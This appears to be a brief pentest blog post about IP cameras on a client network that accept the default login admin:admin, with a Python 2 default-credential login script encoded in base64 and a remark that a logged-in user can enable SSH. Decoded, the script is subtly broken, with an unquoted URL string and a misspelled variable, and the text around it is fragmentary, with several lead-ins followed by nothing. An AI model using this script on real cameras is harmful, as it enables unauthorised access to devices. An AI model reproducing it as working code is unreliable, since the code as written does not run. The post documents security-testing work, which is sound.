Few months ago during some pentest project I found that inside the "Client's Network" we have an access to the IPCam-network. Few more details about it - you'll find below. Here we go...
This time we'll start here:
Spoiler alert: "it's not a bug - it's a feature". ;)
TL;DR:
"Year-by-year" we're talking about all the "ITSecurity-related awareness courses" and 'similar scenarios for possible pentest projects' and... Well - this time it was a similar case. ;]
...yep;] and "admin:admin" of course. ;)
Someone was absent on the first-rule-of-fIghT-club-meeting:
So (as ('in the target network') was a python available ;]) it was a good idea to prepare a small/quick script to check if the default credentials are working on other 'ipcams in the network'. Like this:
For a 'limited environment' - example 'case' (in simple loop) can look like this:
IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMg0KIyBzY2huZWlkZXIgY2FtIGRlZmF1bHQgcGFzc3dvcmQg
dGVzdGluZyBwb2MNCiMgDQppbXBvcnQgdXJsbGliMiwgc3lzDQppbXBvcnQgdXJsbGliDQp0YXJn
ZXQgPSBzeXMuYXJndlsxXQ0KDQpmdWxsVXJsID0gaHR0cDovLyArIHRhcmdldCArICcvYXV0aC9S
TS1SRjoqQU5ZQU5ZL3ZhbGlkYXRlJw0KDQojIGNoZWNraW5nIGRlZmF1bHQgY3JlZGVudGlhbHMg
b25seQ0KcGFyYW1zID0gdXJsbGliLnVybGVuY29kZSggeyd1c2VybmFtZSc6J2FkbWluJywgJ3Bh
c3N3b3JkJzonYWRtaW4nfSApDQpoZWFkZXJzID0geyAnQ29udGVudC10eXBlJzonYXBwbGljYXRp
b24veC13d3ctZm9ybS11cmxlbmNvZGVkJywgJ0FjY2VwdCc6J3RleHQvcGxhaW4nfQ0KDQpmID0g
dXJsbGliLnVybG9wZW4oZnVsVXJsLCBwYXJhbXMsIGhlYWRlcnMpDQpkYXRhID0gZi5yZWFkKCkN
Cg0KaWYgJ0xpdmUnIGluIGRhdGE6DQogIHByaW50ICJbK10gIiArIHRhcmdldCArICIgbG9nZ2Vk
LWluIGFzIGFkbWluISA7KSINCiAgDQojIyAgIA0KDQoNCg==
(P.S.: yes, logged-in user can set 'SSH access' to enable... ;))
Brak komentarzy:
Prześlij komentarz